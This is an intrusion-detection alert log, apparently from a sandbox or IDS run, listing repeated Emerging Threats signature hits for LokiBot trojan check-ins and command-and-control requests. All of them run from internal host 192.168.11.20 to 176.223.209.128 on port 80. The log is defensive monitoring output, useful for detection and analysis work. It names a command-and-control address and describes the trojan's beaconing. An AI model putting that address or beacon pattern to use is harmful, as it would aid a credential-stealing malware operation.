11/25/21-10:53:49.515577	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50517	80	192.168.11.20	176.223.209.128
11/25/21-10:53:49.515577	TCP	2025381	ET TROJAN LokiBot Checkin	50517	80	192.168.11.20	176.223.209.128
11/25/21-10:53:49.515577	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50517	80	192.168.11.20	176.223.209.128
11/25/21-10:53:49.999556	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50518	80	192.168.11.20	176.223.209.128
11/25/21-10:53:49.999556	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50518	80	192.168.11.20	176.223.209.128
11/25/21-10:53:49.999556	TCP	2025381	ET TROJAN LokiBot Checkin	50518	80	192.168.11.20	176.223.209.128
11/25/21-10:53:49.999556	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50518	80	192.168.11.20	176.223.209.128
11/25/21-10:53:50.513340	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50519	80	192.168.11.20	176.223.209.128
11/25/21-10:53:50.513340	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50519	80	192.168.11.20	176.223.209.128
11/25/21-10:53:50.513340	TCP	2025381	ET TROJAN LokiBot Checkin	50519	80	192.168.11.20	176.223.209.128
11/25/21-10:53:50.513340	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50519	80	192.168.11.20	176.223.209.128
11/25/21-10:53:51.030415	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50520	80	192.168.11.20	176.223.209.128
11/25/21-10:53:51.030415	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50520	80	192.168.11.20	176.223.209.128
11/25/21-10:53:51.030415	TCP	2025381	ET TROJAN LokiBot Checkin	50520	80	192.168.11.20	176.223.209.128
11/25/21-10:53:51.030415	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50520	80	192.168.11.20	176.223.209.128
11/25/21-10:53:51.529676	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50521	80	192.168.11.20	176.223.209.128
11/25/21-10:53:51.529676	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50521	80	192.168.11.20	176.223.209.128
11/25/21-10:53:51.529676	TCP	2025381	ET TROJAN LokiBot Checkin	50521	80	192.168.11.20	176.223.209.128
11/25/21-10:53:51.529676	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50521	80	192.168.11.20	176.223.209.128
11/25/21-10:53:52.024613	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50522	80	192.168.11.20	176.223.209.128
11/25/21-10:53:52.024613	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50522	80	192.168.11.20	176.223.209.128
11/25/21-10:53:52.024613	TCP	2025381	ET TROJAN LokiBot Checkin	50522	80	192.168.11.20	176.223.209.128
11/25/21-10:53:52.024613	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50522	80	192.168.11.20	176.223.209.128
11/25/21-10:53:52.530324	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50523	80	192.168.11.20	176.223.209.128
11/25/21-10:53:52.530324	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50523	80	192.168.11.20	176.223.209.128
11/25/21-10:53:52.530324	TCP	2025381	ET TROJAN LokiBot Checkin	50523	80	192.168.11.20	176.223.209.128
11/25/21-10:53:52.530324	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50523	80	192.168.11.20	176.223.209.128
11/25/21-10:53:52.948310	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50524	80	192.168.11.20	176.223.209.128
11/25/21-10:53:52.948310	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50524	80	192.168.11.20	176.223.209.128
11/25/21-10:53:52.948310	TCP	2025381	ET TROJAN LokiBot Checkin	50524	80	192.168.11.20	176.223.209.128
11/25/21-10:53:52.948310	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50524	80	192.168.11.20	176.223.209.128
11/25/21-10:53:53.452600	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50525	80	192.168.11.20	176.223.209.128
11/25/21-10:53:53.452600	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50525	80	192.168.11.20	176.223.209.128
11/25/21-10:53:53.452600	TCP	2025381	ET TROJAN LokiBot Checkin	50525	80	192.168.11.20	176.223.209.128
11/25/21-10:53:53.452600	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50525	80	192.168.11.20	176.223.209.128
11/25/21-10:53:53.973666	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50526	80	192.168.11.20	176.223.209.128
11/25/21-10:53:53.973666	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50526	80	192.168.11.20	176.223.209.128
11/25/21-10:53:53.973666	TCP	2025381	ET TROJAN LokiBot Checkin	50526	80	192.168.11.20	176.223.209.128
11/25/21-10:53:53.973666	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50526	80	192.168.11.20	176.223.209.128
11/25/21-10:53:54.486840	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50527	80	192.168.11.20	176.223.209.128
11/25/21-10:53:54.486840	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50527	80	192.168.11.20	176.223.209.128
11/25/21-10:53:54.486840	TCP	2025381	ET TROJAN LokiBot Checkin	50527	80	192.168.11.20	176.223.209.128
11/25/21-10:53:54.486840	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50527	80	192.168.11.20	176.223.209.128
11/25/21-10:53:54.975392	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50528	80	192.168.11.20	176.223.209.128
11/25/21-10:53:54.975392	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50528	80	192.168.11.20	176.223.209.128
11/25/21-10:53:54.975392	TCP	2025381	ET TROJAN LokiBot Checkin	50528	80	192.168.11.20	176.223.209.128
11/25/21-10:53:54.975392	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50528	80	192.168.11.20	176.223.209.128
11/25/21-10:53:55.408844	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50529	80	192.168.11.20	176.223.209.128
11/25/21-10:53:55.408844	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50529	80	192.168.11.20	176.223.209.128
11/25/21-10:53:55.408844	TCP	2025381	ET TROJAN LokiBot Checkin	50529	80	192.168.11.20	176.223.209.128
11/25/21-10:53:55.408844	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50529	80	192.168.11.20	176.223.209.128
11/25/21-10:53:55.934689	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50530	80	192.168.11.20	176.223.209.128
11/25/21-10:53:55.934689	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50530	80	192.168.11.20	176.223.209.128
11/25/21-10:53:55.934689	TCP	2025381	ET TROJAN LokiBot Checkin	50530	80	192.168.11.20	176.223.209.128
11/25/21-10:53:55.934689	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50530	80	192.168.11.20	176.223.209.128
11/25/21-10:53:56.441220	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50531	80	192.168.11.20	176.223.209.128
11/25/21-10:53:56.441220	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50531	80	192.168.11.20	176.223.209.128
11/25/21-10:53:56.441220	TCP	2025381	ET TROJAN LokiBot Checkin	50531	80	192.168.11.20	176.223.209.128
11/25/21-10:53:56.441220	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50531	80	192.168.11.20	176.223.209.128
11/25/21-10:53:56.962356	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50532	80	192.168.11.20	176.223.209.128
11/25/21-10:53:56.962356	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50532	80	192.168.11.20	176.223.209.128
11/25/21-10:53:56.962356	TCP	2025381	ET TROJAN LokiBot Checkin	50532	80	192.168.11.20	176.223.209.128
11/25/21-10:53:56.962356	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50532	80	192.168.11.20	176.223.209.128
11/25/21-10:53:57.518580	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50533	80	192.168.11.20	176.223.209.128
11/25/21-10:53:57.518580	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50533	80	192.168.11.20	176.223.209.128
11/25/21-10:53:57.518580	TCP	2025381	ET TROJAN LokiBot Checkin	50533	80	192.168.11.20	176.223.209.128
11/25/21-10:53:57.518580	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50533	80	192.168.11.20	176.223.209.128
11/25/21-10:53:58.021953	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50534	80	192.168.11.20	176.223.209.128
11/25/21-10:53:58.021953	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50534	80	192.168.11.20	176.223.209.128
11/25/21-10:53:58.021953	TCP	2025381	ET TROJAN LokiBot Checkin	50534	80	192.168.11.20	176.223.209.128
11/25/21-10:53:58.021953	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50534	80	192.168.11.20	176.223.209.128
11/25/21-10:53:58.510118	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50535	80	192.168.11.20	176.223.209.128
11/25/21-10:53:58.510118	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50535	80	192.168.11.20	176.223.209.128
11/25/21-10:53:58.510118	TCP	2025381	ET TROJAN LokiBot Checkin	50535	80	192.168.11.20	176.223.209.128
11/25/21-10:53:58.510118	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50535	80	192.168.11.20	176.223.209.128
11/25/21-10:53:59.032652	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50536	80	192.168.11.20	176.223.209.128
11/25/21-10:53:59.032652	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50536	80	192.168.11.20	176.223.209.128
11/25/21-10:53:59.032652	TCP	2025381	ET TROJAN LokiBot Checkin	50536	80	192.168.11.20	176.223.209.128
11/25/21-10:53:59.032652	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50536	80	192.168.11.20	176.223.209.128
11/25/21-10:53:59.532045	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50537	80	192.168.11.20	176.223.209.128
11/25/21-10:53:59.532045	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50537	80	192.168.11.20	176.223.209.128
11/25/21-10:53:59.532045	TCP	2025381	ET TROJAN LokiBot Checkin	50537	80	192.168.11.20	176.223.209.128
11/25/21-10:53:59.532045	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50537	80	192.168.11.20	176.223.209.128
11/25/21-10:53:59.984023	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50538	80	192.168.11.20	176.223.209.128
11/25/21-10:53:59.984023	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50538	80	192.168.11.20	176.223.209.128
11/25/21-10:53:59.984023	TCP	2025381	ET TROJAN LokiBot Checkin	50538	80	192.168.11.20	176.223.209.128
11/25/21-10:53:59.984023	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50538	80	192.168.11.20	176.223.209.128
11/25/21-10:54:00.499476	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50539	80	192.168.11.20	176.223.209.128
11/25/21-10:54:00.499476	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50539	80	192.168.11.20	176.223.209.128
11/25/21-10:54:00.499476	TCP	2025381	ET TROJAN LokiBot Checkin	50539	80	192.168.11.20	176.223.209.128
11/25/21-10:54:00.499476	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50539	80	192.168.11.20	176.223.209.128
11/25/21-10:54:00.994605	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50540	80	192.168.11.20	176.223.209.128
11/25/21-10:54:00.994605	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50540	80	192.168.11.20	176.223.209.128
11/25/21-10:54:00.994605	TCP	2025381	ET TROJAN LokiBot Checkin	50540	80	192.168.11.20	176.223.209.128
11/25/21-10:54:00.994605	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50540	80	192.168.11.20	176.223.209.128
11/25/21-10:54:01.467670	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50541	80	192.168.11.20	176.223.209.128
11/25/21-10:54:01.467670	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50541	80	192.168.11.20	176.223.209.128
11/25/21-10:54:01.467670	TCP	2025381	ET TROJAN LokiBot Checkin	50541	80	192.168.11.20	176.223.209.128
11/25/21-10:54:01.467670	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50541	80	192.168.11.20	176.223.209.128
11/25/21-10:54:01.962781	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50542	80	192.168.11.20	176.223.209.128
11/25/21-10:54:01.962781	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50542	80	192.168.11.20	176.223.209.128
11/25/21-10:54:01.962781	TCP	2025381	ET TROJAN LokiBot Checkin	50542	80	192.168.11.20	176.223.209.128
11/25/21-10:54:01.962781	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50542	80	192.168.11.20	176.223.209.128
11/25/21-10:54:02.473185	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50543	80	192.168.11.20	176.223.209.128
11/25/21-10:54:02.473185	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50543	80	192.168.11.20	176.223.209.128
11/25/21-10:54:02.473185	TCP	2025381	ET TROJAN LokiBot Checkin	50543	80	192.168.11.20	176.223.209.128
11/25/21-10:54:02.473185	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50543	80	192.168.11.20	176.223.209.128
11/25/21-10:54:02.999053	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50544	80	192.168.11.20	176.223.209.128
11/25/21-10:54:02.999053	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50544	80	192.168.11.20	176.223.209.128
11/25/21-10:54:02.999053	TCP	2025381	ET TROJAN LokiBot Checkin	50544	80	192.168.11.20	176.223.209.128
11/25/21-10:54:02.999053	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50544	80	192.168.11.20	176.223.209.128
11/25/21-10:54:03.513999	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50545	80	192.168.11.20	176.223.209.128
11/25/21-10:54:03.513999	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50545	80	192.168.11.20	176.223.209.128
11/25/21-10:54:03.513999	TCP	2025381	ET TROJAN LokiBot Checkin	50545	80	192.168.11.20	176.223.209.128
11/25/21-10:54:03.513999	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50545	80	192.168.11.20	176.223.209.128
11/25/21-10:54:04.015227	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50546	80	192.168.11.20	176.223.209.128
11/25/21-10:54:04.015227	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50546	80	192.168.11.20	176.223.209.128
11/25/21-10:54:04.015227	TCP	2025381	ET TROJAN LokiBot Checkin	50546	80	192.168.11.20	176.223.209.128
11/25/21-10:54:04.015227	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50546	80	192.168.11.20	176.223.209.128
11/25/21-10:54:04.523263	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50547	80	192.168.11.20	176.223.209.128
11/25/21-10:54:04.523263	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50547	80	192.168.11.20	176.223.209.128
11/25/21-10:54:04.523263	TCP	2025381	ET TROJAN LokiBot Checkin	50547	80	192.168.11.20	176.223.209.128
11/25/21-10:54:04.523263	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50547	80	192.168.11.20	176.223.209.128
11/25/21-10:54:05.030326	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50548	80	192.168.11.20	176.223.209.128
11/25/21-10:54:05.030326	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50548	80	192.168.11.20	176.223.209.128
11/25/21-10:54:05.030326	TCP	2025381	ET TROJAN LokiBot Checkin	50548	80	192.168.11.20	176.223.209.128
11/25/21-10:54:05.030326	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50548	80	192.168.11.20	176.223.209.128
11/25/21-10:54:05.501409	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50549	80	192.168.11.20	176.223.209.128
11/25/21-10:54:05.501409	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50549	80	192.168.11.20	176.223.209.128
11/25/21-10:54:05.501409	TCP	2025381	ET TROJAN LokiBot Checkin	50549	80	192.168.11.20	176.223.209.128
11/25/21-10:54:05.501409	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50549	80	192.168.11.20	176.223.209.128
11/25/21-10:54:05.963027	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50553	80	192.168.11.20	176.223.209.128
11/25/21-10:54:05.963027	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50553	80	192.168.11.20	176.223.209.128
11/25/21-10:54:05.963027	TCP	2025381	ET TROJAN LokiBot Checkin	50553	80	192.168.11.20	176.223.209.128
11/25/21-10:54:05.963027	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50553	80	192.168.11.20	176.223.209.128
11/25/21-10:54:06.473005	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50554	80	192.168.11.20	176.223.209.128
11/25/21-10:54:06.473005	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50554	80	192.168.11.20	176.223.209.128
11/25/21-10:54:06.473005	TCP	2025381	ET TROJAN LokiBot Checkin	50554	80	192.168.11.20	176.223.209.128
11/25/21-10:54:06.473005	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50554	80	192.168.11.20	176.223.209.128
11/25/21-10:54:06.918600	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50555	80	192.168.11.20	176.223.209.128
11/25/21-10:54:06.918600	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50555	80	192.168.11.20	176.223.209.128
11/25/21-10:54:06.918600	TCP	2025381	ET TROJAN LokiBot Checkin	50555	80	192.168.11.20	176.223.209.128
11/25/21-10:54:06.918600	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50555	80	192.168.11.20	176.223.209.128
11/25/21-10:54:07.389479	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50556	80	192.168.11.20	176.223.209.128
11/25/21-10:54:07.389479	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50556	80	192.168.11.20	176.223.209.128
11/25/21-10:54:07.389479	TCP	2025381	ET TROJAN LokiBot Checkin	50556	80	192.168.11.20	176.223.209.128
11/25/21-10:54:07.389479	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50556	80	192.168.11.20	176.223.209.128
11/25/21-10:54:07.893918	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50557	80	192.168.11.20	176.223.209.128
11/25/21-10:54:07.893918	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50557	80	192.168.11.20	176.223.209.128
11/25/21-10:54:07.893918	TCP	2025381	ET TROJAN LokiBot Checkin	50557	80	192.168.11.20	176.223.209.128
11/25/21-10:54:07.893918	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50557	80	192.168.11.20	176.223.209.128
11/25/21-10:54:08.406130	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50558	80	192.168.11.20	176.223.209.128
11/25/21-10:54:08.406130	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50558	80	192.168.11.20	176.223.209.128
11/25/21-10:54:08.406130	TCP	2025381	ET TROJAN LokiBot Checkin	50558	80	192.168.11.20	176.223.209.128
11/25/21-10:54:08.406130	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50558	80	192.168.11.20	176.223.209.128
11/25/21-10:54:08.906488	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50559	80	192.168.11.20	176.223.209.128
11/25/21-10:54:08.906488	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50559	80	192.168.11.20	176.223.209.128
11/25/21-10:54:08.906488	TCP	2025381	ET TROJAN LokiBot Checkin	50559	80	192.168.11.20	176.223.209.128
11/25/21-10:54:08.906488	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50559	80	192.168.11.20	176.223.209.128
11/25/21-10:54:09.414303	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50560	80	192.168.11.20	176.223.209.128
11/25/21-10:54:09.414303	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50560	80	192.168.11.20	176.223.209.128
11/25/21-10:54:09.414303	TCP	2025381	ET TROJAN LokiBot Checkin	50560	80	192.168.11.20	176.223.209.128
11/25/21-10:54:09.414303	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50560	80	192.168.11.20	176.223.209.128
11/25/21-10:54:09.910267	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50561	80	192.168.11.20	176.223.209.128
11/25/21-10:54:09.910267	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50561	80	192.168.11.20	176.223.209.128
11/25/21-10:54:09.910267	TCP	2025381	ET TROJAN LokiBot Checkin	50561	80	192.168.11.20	176.223.209.128
11/25/21-10:54:09.910267	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50561	80	192.168.11.20	176.223.209.128
11/25/21-10:54:10.396251	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50562	80	192.168.11.20	176.223.209.128
11/25/21-10:54:10.396251	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50562	80	192.168.11.20	176.223.209.128
11/25/21-10:54:10.396251	TCP	2025381	ET TROJAN LokiBot Checkin	50562	80	192.168.11.20	176.223.209.128
11/25/21-10:54:10.396251	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50562	80	192.168.11.20	176.223.209.128
11/25/21-10:54:10.902123	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50563	80	192.168.11.20	176.223.209.128
11/25/21-10:54:10.902123	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50563	80	192.168.11.20	176.223.209.128
11/25/21-10:54:10.902123	TCP	2025381	ET TROJAN LokiBot Checkin	50563	80	192.168.11.20	176.223.209.128
11/25/21-10:54:10.902123	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50563	80	192.168.11.20	176.223.209.128
11/25/21-10:54:11.424071	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50564	80	192.168.11.20	176.223.209.128
11/25/21-10:54:11.424071	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50564	80	192.168.11.20	176.223.209.128
11/25/21-10:54:11.424071	TCP	2025381	ET TROJAN LokiBot Checkin	50564	80	192.168.11.20	176.223.209.128
11/25/21-10:54:11.424071	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50564	80	192.168.11.20	176.223.209.128
11/25/21-10:54:11.949253	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50565	80	192.168.11.20	176.223.209.128
11/25/21-10:54:11.949253	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50565	80	192.168.11.20	176.223.209.128
11/25/21-10:54:11.949253	TCP	2025381	ET TROJAN LokiBot Checkin	50565	80	192.168.11.20	176.223.209.128
11/25/21-10:54:11.949253	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50565	80	192.168.11.20	176.223.209.128
11/25/21-10:54:12.442910	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50566	80	192.168.11.20	176.223.209.128
11/25/21-10:54:12.442910	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50566	80	192.168.11.20	176.223.209.128
11/25/21-10:54:12.442910	TCP	2025381	ET TROJAN LokiBot Checkin	50566	80	192.168.11.20	176.223.209.128
11/25/21-10:54:12.442910	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50566	80	192.168.11.20	176.223.209.128
11/25/21-10:54:12.904803	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50567	80	192.168.11.20	176.223.209.128
11/25/21-10:54:12.904803	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50567	80	192.168.11.20	176.223.209.128
11/25/21-10:54:12.904803	TCP	2025381	ET TROJAN LokiBot Checkin	50567	80	192.168.11.20	176.223.209.128
11/25/21-10:54:12.904803	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50567	80	192.168.11.20	176.223.209.128
11/25/21-10:54:13.432566	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50568	80	192.168.11.20	176.223.209.128
11/25/21-10:54:13.432566	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50568	80	192.168.11.20	176.223.209.128
11/25/21-10:54:13.432566	TCP	2025381	ET TROJAN LokiBot Checkin	50568	80	192.168.11.20	176.223.209.128
11/25/21-10:54:13.432566	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50568	80	192.168.11.20	176.223.209.128
11/25/21-10:54:13.930896	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50569	80	192.168.11.20	176.223.209.128
11/25/21-10:54:13.930896	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50569	80	192.168.11.20	176.223.209.128
11/25/21-10:54:13.930896	TCP	2025381	ET TROJAN LokiBot Checkin	50569	80	192.168.11.20	176.223.209.128
11/25/21-10:54:13.930896	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50569	80	192.168.11.20	176.223.209.128
11/25/21-10:54:14.436252	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50570	80	192.168.11.20	176.223.209.128
11/25/21-10:54:14.436252	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50570	80	192.168.11.20	176.223.209.128
11/25/21-10:54:14.436252	TCP	2025381	ET TROJAN LokiBot Checkin	50570	80	192.168.11.20	176.223.209.128
11/25/21-10:54:14.436252	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50570	80	192.168.11.20	176.223.209.128
11/25/21-10:54:14.939600	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50571	80	192.168.11.20	176.223.209.128
11/25/21-10:54:14.939600	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50571	80	192.168.11.20	176.223.209.128
11/25/21-10:54:14.939600	TCP	2025381	ET TROJAN LokiBot Checkin	50571	80	192.168.11.20	176.223.209.128
11/25/21-10:54:14.939600	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50571	80	192.168.11.20	176.223.209.128
11/25/21-10:54:15.422756	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50572	80	192.168.11.20	176.223.209.128
11/25/21-10:54:15.422756	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50572	80	192.168.11.20	176.223.209.128
11/25/21-10:54:15.422756	TCP	2025381	ET TROJAN LokiBot Checkin	50572	80	192.168.11.20	176.223.209.128
11/25/21-10:54:15.422756	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50572	80	192.168.11.20	176.223.209.128
11/25/21-10:54:15.874761	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50573	80	192.168.11.20	176.223.209.128
11/25/21-10:54:15.874761	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50573	80	192.168.11.20	176.223.209.128
11/25/21-10:54:15.874761	TCP	2025381	ET TROJAN LokiBot Checkin	50573	80	192.168.11.20	176.223.209.128
11/25/21-10:54:15.874761	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50573	80	192.168.11.20	176.223.209.128
11/25/21-10:54:16.294505	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50574	80	192.168.11.20	176.223.209.128
11/25/21-10:54:16.294505	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50574	80	192.168.11.20	176.223.209.128
11/25/21-10:54:16.294505	TCP	2025381	ET TROJAN LokiBot Checkin	50574	80	192.168.11.20	176.223.209.128
